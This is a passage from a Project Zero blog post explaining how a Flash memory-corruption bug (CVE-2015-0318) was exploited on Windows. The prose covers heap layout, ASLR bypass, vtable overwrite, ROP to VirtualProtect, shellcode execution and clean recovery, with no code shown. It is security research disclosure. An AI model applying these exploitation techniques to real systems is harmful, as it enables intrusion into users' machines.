vertical-align: baseline; white-space: pre-wrap;"> </span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">is based, so any memory accesses we do are relative to that buffer.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">3 - Where is our corrupted Vector?</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Conveniently, the PCRE code deterministically frees the buffer that was allocated for the oversized offset vector immediately before returning to actionscript. This means that we can look back behind our vector and grab a freelist pointer from inside that free block.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> _______________________________________________________________________________________</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|FREE |</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">ptr</span><span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">| |length|vector-------------|UINT_MAX|vector---------------|</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">````````````````````````````````````````````````````````````````````````````````````````</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">This pointer will point to the next available block, which will most likely be the block following our extra-large vector; we can sanity check this a little, but it’s not really necessary - the block size is large, and this is a pretty safe bet. As we know the precise size of the heap allocations, we can use this to compute the address of our extra-large vector, and turn our relative read-write primitive into an absolute read-write.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">_______________________________________________________________________________________________________</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|FREE |</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">ptr</span><span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">| |length|vector-------------|UINT_MAX|vector---------------|FREE|ptr| </span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">``````````</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|</span><span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">`````````````````````````````````````````````````````````````````````````````</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">^</span><span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">``````````````</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; vertical-align: baseline; white-space: pre-wrap;">|_____________________________________________________________________________|</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">4 - Formalities</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The rest of this is really a 101 on exploiting a userland Windows arbitrary read/write; feel free to skip if you get bored...</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">4 (i) Finding a module</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">We’ve sort-of bypassed ASLR by locating our Vector object; but we don’t really know where everything is yet; ideally we need a pointer into a loaded module that we can use for code-reuse techniques. One way to get such a pointer would be to spray the heap some more with objects containing pointers, but we don’t need to do this today.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">As it happens, there’s a nice structure at the start of every page used by the Flash FixedAlloc allocator that contains a pointer that eventually chains to a static instance of a C++ class; this is inside the Flash module, so we can use this to locate the Flash module in memory. See the exploit code…</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Once we have a pointer inside a module, we can scan backwards from that pointer, checking the start of each page for the magic MZ header to locate the module base. It’s then just a matter of parsing the PE file format to locate useful imports and byte sequences that we can use in the final stage of our exploit.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">4 (ii) Something to overwrite</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Again, we’ve sort-of bypassed ASLR… If this was a linux exploit, and there was no RELRO, we could just overwrite a function pointer in the GOT section like in </span><a href="http://googleprojectzero.blogspot.ch/2014/09/exploiting-cve-2014-0556-in-flash.html" style="text-decoration: none;"><span style="color: #1155cc; font-family: Arial; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Chris’ previous blog post</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">; on Windows there’s not quite such a convenient technique. With some reverse engineering of the Flash binary, we’d probably find a global function pointer somewhere that we could overwrite, but it’s easier to arrange for something on the heap.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">If we create another ActionScript class, then when we instantiate this class, this will be an allocation on the heap, and it will contain a vtable pointer that’s used to resolve method invocations on that object. We can make a class with some readily signaturable bytes in it, and make it easy to find; then by walking the heap structures we can safely locate this class instance without risk of touching unmapped memory and crashing.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">4 (iii) Getting control of execution</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">An interesting and useful feature of the Flash JIT is that if the arguments to a method invocation can be determined to be simple native types, then they will actually be pushed onto the native stack (as in a normal, native function call). This means that by overwriting the function pointer for a function with a lot of uint parameters, we can control a large block of the native stack when that function is called, letting us ROP directly on the legitimate program stack.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">All we need to do is make a call to VirtualProtect to mark the page with our Vector in it as executable, and we can put our shellcode in there and just jump to that buffer. </span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">A slight trick is that by arranging for lots of stack space to be used by nonsense arguments; we can make enough stack space so that when VirtualProtect is called, it won’t damage the real Flash stack frames (which are both above and below our fake stack frames…).</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">4 (iv) Returning control of execution</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">So, we’ve successfully redirected execution - all that remains is to return control of execution to Flash, and tie up a few loose ends. Taking stock of the damage that we’ve done to the process; if everything went well, we’ve only corrupted 3 dwords of process memory that are actually being used by Flash, so it should be fairly easy to clean up and continue execution:</span></div> <br /><ol style="margin-bottom: 0pt; margin-top: 0pt;"> <li dir="ltr" style="font-family: Arial; font-size: 15px; list-style-type: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="vertical-align: baseline; white-space: pre-wrap;">The length of the first vector was increased by 1</span></div> </li> <li dir="ltr" style="font-family: Arial; font-size: 15px; list-style-type: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="vertical-align: baseline; white-space: pre-wrap;">The length of the second vector was increased to UINT_MAX</span></div> </li> <li dir="ltr" style="font-family: Arial; font-size: 15px; list-style-type: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="vertical-align: baseline; white-space: pre-wrap;">The function pointer for our method</span></div> </li> </ol> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">1 is cleaned up immediately by the exploit once we have overwritten the length of the second vector; there’s no need to leave that as is. 2 needs to be cleaned up, since when the vector is free’d Flash will try to clear all of the memory… This can be done trivially from actionscript though, once we no longer need the vector; in fact we fix this before getting control of execution, since we can be sure that 3 will never be used again, and so don’t need to fix it.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">This means that if we can just line up things right, we can just return back as though the method invocation succeeded, and Flash will keep running as though everything is just fine. Practically, the simplest way to achieve this was to fix up the stack frame to contain the correct function pointer, and jump to the actual method implementation; so essentially our ROP payload and shellcode act as a transparent function hook applied to the method.</span></div> <div> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div> </span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Anonymous</span> </span> </span> <span class='post-timestamp'> at <meta content='https://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html' itemprop='url'/> <a class='timestamp-link' href='https://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2015-02-12T09:39:00-08:00'>9:39 AM</abbr></a> </span> <span class='post-comment-link'> <a class='comment-link' href='https://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html#comment-form' onclick=''> 6 comments: </a> </span> <span class='post-icons'> <span class='item-control blog-admin pid-836442233'> <a href='https://www.blogger.com/post-edit.g?blogID=4838136820032157985&postID=1656803005637984371&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> <a class='goog-inline-block share-button sb-email' href='https://www.blogger.com/share-post.g?blogID=4838136820032157985&postID=1656803005637984371&target=email' target='_blank' title='Email This'><span class='share-button-link-text'>Email This</span></a><a class='goog-inline-block share-button sb-blog' href='https://www.blogger.com/share-post.g?blogID=4838136820032157985&postID=1656803005637984371&target=blog' onclick='window.open(this.href, "_blank", "height=270,width=475"); return false;' target='_blank' title='BlogThis!'><span class='share-button-link-text'>BlogThis!</span></a><a class='goog-inline-block share-button sb-twitter' href='https://www.blogger.com/share-post.g?blogID=4838136820032157985&postID=1656803005637984371&target=twitter' target='_blank' title='Share to X'><span class='share-button-link-text'>Share to X</span></a><a class='goog-inline-block share-button sb-facebook' href='https://www.blogger.com/share-post.g?blogID=4838136820032157985&postID=1656803005637984371&target=facebook' onclick='window.open(this.href, "_blank", "height=430,width=640"); return false;' target='_blank' title='Share to Facebook'><span class='share-button-link-text'>Share to Facebook</span></a><a class='goog-inline-block share-button sb-pinterest' href='https://www.blogger.com/share-post.g?blogID=4838136820032157985&postID=1656803005637984371&target=pinterest' target='_blank' title='Share to Pinterest'><span class='share-button-link-text'>Share to Pinterest</span></a> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> </div></div> </div> <div class='blog-pager' id='blog-pager'> <span id='blog-pager-newer-link'> <a class='blog-pager-newer-link' href='https://googleprojectzero.blogspot.com/search?updated-max=2015-03-19T13:34:00-07:00&max-results=1&reverse-paginate=true' id='Blog1_blog-pager-newer-link' title='Newer Posts'>Newer Posts</a> </span> <span id='blog-pager-older-link'> <a class='blog-pager-older-link' href='https://googleprojectzero.blogspot.com/search?updated-max=2015-02-12T09:39:00-08:00&max-results=1' id='Blog1_blog-pager-older-link' title='Older Posts'>Older Posts</a> </span> <a class='home-link' href='https://googleprojectzero.blogspot.com/'>Home</a> </div> <div class='clear'></div> <div class='blog-feeds'> <div class='feed-links'> Subscribe to: <a class='feed-link' href='https://googleprojectzero.blogspot.com/feeds/posts/default' target='_blank' type='application/atom+xml'>Posts (Atom)</a> </div> </div> </div></div> </div> </div> <div class='column-left-outer'> <div class='column-left-inner'> <aside> </aside> </div> </div> <div class='column-right-outer'> <div class='column-right-inner'> <aside> <div class='sidebar section' id='sidebar-right-1'><div class='widget BlogSearch' data-version='1' id='BlogSearch1'> <h2 class='title'>Search This Blog</h2> <div class='widget-content'> <div id='BlogSearch1_form'> <form action='https://googleprojectzero.blogspot.com/search' class='gsc-search-box' target='_top'> <table cellpadding='0' cellspacing='0' class='gsc-search-box'> <tbody> <tr> <td class='gsc-input'> <input autocomplete='off' class='gsc-input' name='q' size='10' title='search' type='text' value=''/> </td> <td class='gsc-search-button'> <input class='gsc-search-button' title='search' type='submit' value='Search'/> </td> </tr> </tbody> </table> </form> </div> </div> <div class='clear'></div> </div><div class='widget PageList' data-version='1' id='PageList1'> <h2>Pages</h2> <div class='widget-content'> <ul> <li> <a href='https://googleprojectzero.blogspot.com/p/about-project-zero.html'>About Project Zero</a> </li> <li> <a href='https://googleprojectzero.blogspot.com/p/working-at-project-zero.html'>Working at Project Zero</a> </li> <li> <a href='https://googleprojectzero.blogspot.com/p/0day.html'>0day "In the Wild"</a> </li> <li> <a href='https://googleprojectzero.github.io/0days-in-the-wild/rca.html'>0day Exploit Root Cause Analyses</a> </li> <li> <a href='https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-faq.html'>Vulnerability Disclosure FAQ</a> </li> </ul> <div class='clear'></div> </div> </div><div class='widget BlogArchive' data-version='1' id='BlogArchive1'> <h2>Archives</h2> <div class='widget-content'> <div id='ArchiveList'> <div id='BlogArchive1_ArchiveList'> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2024/'> 2024 </a> <span class='post-count' dir='ltr'>(9)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2024/11/'> November </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2024/10/'> October </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2024/06/'> June </a> <span class='post-count' dir='ltr'>(3)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2024/04/'> April </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2023/'> 2023 </a> <span class='post-count' dir='ltr'>(11)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2023/11/'> November </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2023/10/'> October </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2023/09/'> September </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2023/08/'> August </a> <span class='post-count' dir='ltr'>(4)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2023/04/'> April </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2023/03/'> March </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2023/01/'> January </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2022/'> 2022 </a> <span class='post-count' dir='ltr'>(17)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2022/12/'> December </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2022/11/'> November </a> <span class='post-count' dir='ltr'>(3)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2022/10/'> October </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2022/08/'> August </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2022/06/'> June </a> <span class='post-count' dir='ltr'>(3)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2022/05/'> May </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2022/04/'> April </a> <span class='post-count' dir='ltr'>(3)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2022/03/'> March </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2022/02/'> February </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2022/01/'> January </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2021/'> 2021 </a> <span class='post-count' dir='ltr'>(24)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2021/12/'> December </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2021/10/'> October </a> <span class='post-count' dir='ltr'>(3)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2021/09/'> September </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2021/08/'> August </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2021/06/'> June </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2021/05/'> May </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2021/04/'> April </a> <span class='post-count' dir='ltr'>(3)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2021/03/'> March </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2021/02/'> February </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2021/01/'> January </a> <span class='post-count' dir='ltr'>(10)</span> </li> </ul> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2020/'> 2020 </a> <span class='post-count' dir='ltr'>(36)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2020/12/'> December </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2020/11/'> November </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2020/10/'> October </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2020/09/'> September </a> <span class='post-count' dir='ltr'>(4)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2020/08/'> August </a> <span class='post-count' dir='ltr'>(5)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2020/07/'> July </a> <span class='post-count' dir='ltr'>(8)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2020/06/'> June </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2020/04/'> April </a> <span class='post-count' dir='ltr'>(3)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2020/02/'> February </a> <span class='post-count' dir='ltr'>(4)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2020/01/'> January </a> <span class='post-count' dir='ltr'>(5)</span> </li> </ul> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2019/'> 2019 </a> <span class='post-count' dir='ltr'>(27)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2019/12/'> December </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2019/11/'> November </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2019/10/'> October </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2019/09/'> September </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2019/08/'> 